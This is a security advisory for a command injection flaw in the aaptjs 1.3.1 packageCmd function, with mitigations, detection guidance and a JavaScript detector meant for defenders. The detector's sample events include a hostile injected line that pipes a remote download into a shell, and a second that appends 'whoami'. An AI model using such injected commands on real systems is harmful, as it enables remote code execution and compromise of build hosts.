CVE-2020-36378

9.8 CRITICAL

📋 TL;DR

CVE-2020-36378 is a command injection vulnerability in the packageCmd function of shenzhim aaptjs 1.3.1, a Node.js wrapper around Android's aapt tool. packageCmd splices the caller-supplied filePath into a shell command string, so shell metacharacters in filePath (;, &, |, $(), backticks, newlines) are interpreted and an attacker who controls that value runs arbitrary OS commands. The commands execute with the privileges of the Node process that called aaptjs; where that process is reachable over the network and runs with elevated rights, the result is unauthenticated remote code execution.

💻 Affected Systems

Products:
  • shenzhim aaptjs
Versions: 1.3.1
Operating Systems: Linux, Windows, macOS
Default Config Vulnerable: ⚠️ Yes
Notes: Any system running aaptjs 1.3.1 where filePath (or any other path-like argument handed to the library) can be influenced by an untrusted party is vulnerable, for example file names taken from uploads, API parameters or untrusted repository contents. This most commonly means Android build pipelines, CI runners and services that package APKs on demand.

📦 What is this software?

aaptjs is a small Node.js library that wraps the Android Asset Packaging Tool (aapt) so JavaScript code can package, list, dump and modify APK resources by calling functions such as packageCmd instead of invoking the aapt binary by hand.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the host when the Node process that calls aaptjs runs as root or administrator (common on build agents): the attacker installs backdoors, steals signing keys and secrets, and pivots to other systems reachable from the build network.

🟠

Likely Case

Code execution as the build or service user, leading to theft of source code, credentials and signing keys, cryptocurrency mining, or ransomware deployment on the build server.

🟢

If Mitigated

Injection is blocked outright by allowlist validation of filePath, or is confined to a throwaway container with no network access and no secrets, so the attacker gains nothing beyond that container.

🌐 Internet-Facing: HIGH - Exploitable remotely without authentication wherever a web interface or API passes attacker-supplied file names or paths to aaptjs.
🏢 Internal Only: HIGH - Internal build systems remain at risk from insiders, compromised developer accounts, or untrusted file names arriving through source repositories and CI inputs.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Simple command injection: because the command line is executed through a shell, any shell metacharacters in filePath are honoured. The GitHub issue shows the vulnerable code path. No authentication is required when the endpoint that reaches packageCmd is exposed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.3.2 or later (confirm that a fixed release is actually published with npm view aaptjs versions; if none is, treat the workarounds below as the fix)

Vendor Advisory: https://github.com/shenzhim/aaptjs/issues/2

Restart Required: Yes - running Node processes keep the old module loaded; restart or redeploy every service and build agent that uses aaptjs after updating.

Instructions:

1. Confirm a fixed release exists: npm view aaptjs versions
2. Update to it: npm install aaptjs@latest (npm update only moves within the semver range already in package.json, so pin the fixed version in package.json and the lockfile)
3. Verify the installed version: npm list aaptjs
4. Restart the services and build agents that load the module, then re-run a build with known-good filePath inputs and confirm the application never hands user-controlled strings to aaptjs.

🔧 Temporary Workarounds

Input Validation Wrapper

all

Validate filePath against a strict allowlist before it reaches aaptjs and reject anything that fails; do not strip characters, because a blacklist such as ; & | $ ` misses ( ) < > quotes, spaces and carriage returns. Where you control the call site, prefer child_process.execFile or spawn with an argument array over building a shell string.

// JavaScript example: reject rather than strip
if (!/^[A-Za-z0-9._\/-]+$/.test(filePath)) throw new Error('unsafe filePath');

Sandbox Execution

linux

Run the build step that calls aaptjs in a throwaway container with no network, no capabilities, a read-only root filesystem and a non-root user, so an injected command cannot reach secrets or call out. The script name and host path below are placeholders.

docker run --rm --read-only --network none --cap-drop=ALL --user 1000:1000 -v /safe/path:/data node node /data/your-build-script.js

🧯 If You Can't Patch

  • Remove or disable the code paths that call aaptjs from internet-facing systems, or front them with strict allowlist validation of every path-like argument
  • Run build agents that use aaptjs as a dedicated low-privilege user with no access to signing keys, deployment credentials or other tenants' workspaces
  • Implement network segmentation and egress filtering to isolate systems using vulnerable aaptjs versions, so a successful injection cannot fetch a second stage or exfiltrate

🔍 How to Verify

Check if Vulnerable:

Check package.json and the lockfile, or run: npm list aaptjs | grep 'aaptjs@1.3.1' (look in every project and CI image, not only the one you happen to be in)

Check Version:

npm list aaptjs

Verify Fix Applied:

Run: npm list aaptjs | grep -q 'aaptjs@1.3.1' && echo 'Still vulnerable' || echo 'Not 1.3.1' (the earlier form grep -v 1.3.1 always matches the project header line, so it would report "Not vulnerable" even on an unpatched tree). A version check only proves the package changed; also confirm the call sites no longer pass untrusted strings to aaptjs.

📡 Detection & Monitoring

Log Indicators:

  • Shell processes (sh, bash, cmd.exe) spawned by node whose command line runs aapt followed by a second command; aaptjs itself is a library, not a process, so look at the shell child_process.exec starts
  • Request or job parameters that end up as file paths and contain shell metacharacters (;, &, |, $(), backticks, newlines)

Network Indicators:

  • Unexpected outbound connections from build servers, particularly curl or wget children of a node-spawned shell
  • Traffic to known malicious IPs or to newly seen domains from systems running aaptjs

SIEM Query:

process.parent.name:(node OR node.exe) AND process.name:(sh OR bash OR cmd.exe) AND process.command_line:*aapt* AND process.command_line:(*;* OR *|* OR *&* OR *$(* OR *`*)
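The detector below is an added example, not part of the advisory and not something aaptjs ships. It applies the SIEM logic above to process-creation events: child_process.exec runs its command string through sh -c on POSIX and cmd.exe /c on Windows, so an exploit shows up as node spawning a shell whose command line both runs aapt and carries shell control characters. The event field names (host, pid, parent_name, name, cmdline) and the sample events are constructed for the example; map the fields to your EDR's schema.

```javascript
"use strict";
// Added detection example for CVE-2020-36378; event schema is an assumption.

const SHELLS = new Set(["sh", "bash", "dash", "zsh", "cmd.exe"]);
// Separators and substitutions that let a second command ride along inside
// the single string child_process.exec hands to the shell.
const CONTROL = /[;&|`]|\$\(|\n/;
// aapt as a standalone word, with or without the Windows .exe suffix.
const AAPT = /\baapt(\.exe)?\b/;

// True when one event matches the exploit shape described in the advisory.
function isAaptShellInjection(ev) {
  if (!ev || typeof ev.cmdline !== "string") return false;
  if (ev.parent_name !== "node" && ev.parent_name !== "node.exe") return false;
  if (!SHELLS.has(ev.name)) return false;
  if (!AAPT.test(ev.cmdline)) return false;
  return CONTROL.test(ev.cmdline);
}

// Scans newline-delimited JSON events and returns the matches.
// Malformed lines are skipped rather than aborting the scan.
function scanEvents(jsonLines) {
  const hits = [];
  for (const line of jsonLines.split("\n")) {
    if (!line.trim()) continue;
    let ev;
    try {
      ev = JSON.parse(line);
    } catch (e) {
      continue;
    }
    if (isAaptShellInjection(ev)) {
      hits.push({ host: ev.host, pid: ev.pid, cmdline: ev.cmdline });
    }
  }
  return hits;
}

// Constructed sample telemetry, not real logs.
const SAMPLE_EVENTS = [
  { host: "build01", pid: 4101, parent_name: "node", name: "sh",
    cmdline: "sh -c aapt package -f -M AndroidManifest.xml -F out/app.apk" },
  { host: "build01", pid: 4102, parent_name: "node", name: "sh",
    cmdline: "sh -c aapt package -f -M AndroidManifest.xml -F out.apk; curl http://198.51.100.7/s | sh" },
  { host: "build01", pid: 4103, parent_name: "node", name: "sh",
    cmdline: "sh -c npm run lint && npm test" },
  { host: "build02", pid: 5120, parent_name: "java", name: "sh",
    cmdline: "sh -c aapt dump badging app.apk && echo done" },
  { host: "winbuild", pid: 777, parent_name: "node.exe", name: "cmd.exe",
    cmdline: "cmd.exe /d /s /c aapt.exe package -F out.apk & whoami" },
].map((e) => JSON.stringify(e)).join("\n") + "\nthis line is not json\n";

function demo() {
  return scanEvents(SAMPLE_EVENTS);
}

module.exports = { isAaptShellInjection, scanEvents, demo, SAMPLE_EVENTS };
```

Event 4101 is a clean aapt run, 4103 uses && but never runs aapt, and 5120 comes from a Java parent rather than node, so only 4102 and the Windows event fire. Legitimate build scripts that chain aapt with && under node will also match; tune by allowlisting the exact command lines your pipeline emits rather than by dropping the metacharacter test.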
